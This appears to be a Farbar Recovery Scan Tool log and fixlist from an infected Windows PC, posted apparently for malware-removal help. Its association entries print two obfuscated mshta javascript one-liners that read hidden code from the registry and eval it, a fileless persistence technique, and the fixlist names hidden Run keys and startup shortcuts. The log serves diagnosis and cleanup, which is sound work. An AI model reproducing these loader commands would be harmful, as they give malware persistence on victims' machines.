Task: {9FFE5BAE-9E2D-4624-AA2B-DE15303E7A79} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D5324F-47C6-4530-8824-C6B4E5EC401F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A6614028-9517-4EEE-BACC-B097F2B1A56F} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD28BEBC-2AED-40E8-B7C6-06EBFF9F32B1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {B2AE284D-9DD9-442A-A349-D5F4A4AD0844} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B4D9E1EA-D74E-4E70-BE88-E87448FEB212} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B6845A6F-8D15-4217-AEC1-11704CC32EE1} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B83E3A53-FCDF-4B31-98AC-DB794D28C910} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {C9ED5E49-9E11-4673-82F4-8D342CE058E1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {D7D53338-C725-4562-B365-F5547223869C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-12-13] (Adobe Systems Incorporated)
Task: {E1A55A6B-AF6A-4FBD-BA0E-F32178F5A63C} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E81B0FC1-BB37-4629-964D-9979EA8D3555} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F20BC99F-B740-4C9E-8EB7-371A89231811} - System32\Tasks\Microsoft\Windows\Setup\UpgradeTriggers\UpgradeNowTask => C:\WINDOWS\System32\GWX\GWXUXWorker.exe
Task: {F2575FD3-6D7D-4BC1-9BFF-3DA6F2E10777} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F8C0FB64-4C7D-4CFB-8D81-D74199DDACA8} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FDC49832-2BBA-446B-B0E9-488A6F92E85F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk -> C:\Users\Dorraine\AppData\Local\7df78865\b9023127.bat ()
Shortcut: C:\Users\Dorraine\AppData\Local\360fd\41727.lnk -> C:\Users\Dorraine\AppData\Local\360fd\cf9bd.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-26 20:16 - 2016-09-26 20:16 - 01864384 _____ () C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-09-26 23:41 - 2016-09-26 23:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-13 22:59 - 2016-12-09 04:41 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-13 22:59 - 2016-12-09 04:40 - 00693248 _____ () C:\Windows\ShellExperiences\MtcUvc.dll
2016-11-08 20:51 - 2016-11-02 05:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-08 20:51 - 2016-11-02 05:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-08 20:51 - 2016-11-02 05:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-08 20:51 - 2016-11-02 05:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-11-08 20:51 - 2016-11-02 05:13 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-16 15:55 - 2016-12-16 15:55 - 63810560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\libcef.dll
2016-12-19 10:02 - 2016-12-19 10:02 - 17833560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\plugins\pepflashplayer32_24_0_0_186.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\localhost -> localhost
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0411dd.com -> 0411dd.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0511zfhl.com -> 0511zfhl.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0632qyw.com -> 0632qyw.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1001movie.com -> 1001movie.com
There are 6091 more sites.
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: WsAppService => 2
HKLM\...\StartupApproved\Run32: => "Aimersoft Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "Spotify Web Helper"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{B163DA3D-355A-40AD-BEE9-9FB9E2C152FF}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0CE8B62-B6BC-4673-A410-6A2F045F14CD}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D1F7E853-6C1A-4009-91E8-74231D828776}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{7FC2EB58-0005-4FBA-8C88-D848CEF76D2F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{66E30416-1ECD-4FC1-B535-9FC79A3BFB79}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{D5DB3676-ADA6-444D-BF97-303E16719040}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{150A971D-796E-460A-9946-4D0DB57590F0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{8F5D07E7-6D45-4C5C-9037-05DAD0A27745}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FB15462A-A1F4-4E72-B28A-62B359F2D74F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{56076514-A7BE-4A47-B536-6C1658DBA05D}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{4F454C47-904F-4370-B007-FA372696CB67}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{1F425925-0F49-4E3A-9EFB-4164F18CAF22}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{6796C32A-D4FC-4F07-A7CA-74B6A1718A64}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{59AD021A-028E-4125-B679-AA29F604379C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [TCP Query User{3312017F-DCA5-45EB-A03A-8F7CF93AA496}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{40346371-22B6-4E45-B2EA-4CFFF0CA8709}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{1273B45E-EB79-4706-A0EA-96B31F17F496}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D21F287F-8980-4A80-BD50-55EA7519F7F5}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [{73E3D461-EE06-40E4-ACB7-63AA2FA38FFC}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F2AC9C5B-DB98-4E25-9F59-780FE583C00C}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D845F3E0-1651-4A9E-983B-DBFFE9E31753}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{709A9412-72DC-483D-82D9-E2DC27C0D0D1}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{B9F440A3-7187-4E55-85CB-EB2031F83E61}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{3A4F7DDD-6F1B-4DF7-B0BC-CFB9F537A410}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{746098AE-C767-4ED8-BFE9-2276C9566D7A}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [UDP Query User{887C56BC-951B-4C94-A7B5-8281095FE2E1}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [{47796F37-BB7F-4635-9494-D22ACEA954A3}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
==================== Restore Points =========================
10-12-2016 03:50:58 Scheduled Checkpoint
14-12-2016 05:53:45 Windows Update
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (01/10/2017 10:23:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 10:18:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:58:16 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:38 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
System errors:
=============
Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 11:38:02 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 03:52:38 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 03:52:32 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 07:01:35 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppX9s1cz53zc86xn39kwrb02jyft9ecn62r.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Error: (01/10/2017 07:00:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.
Error: (01/10/2017 06:58:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.
Error: (01/10/2017 06:54:58 AM) (Source: DCOM) (EventID: 10010) (User: Dorraine-PC)
Description: The server App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca did not register with DCOM within the required timeout.
Error: (01/10/2017 06:52:58 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppXdca9rykvbm0qn1fw9m2dbx828p2w3h8p.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
==================== Memory info ===========================
Processor: AMD Athlon II X2 240 Processor
Percentage of memory in use: 72%
Total physical RAM: 3838.97 MB
Available physical RAM: 1037.39 MB
Total Virtual: 7678.97 MB
Available Virtual: 3211.21 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.22 GB) (Free:422.69 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BF18BF18)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
==================== End of Addition.txt ====================
Fixlist.txt:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
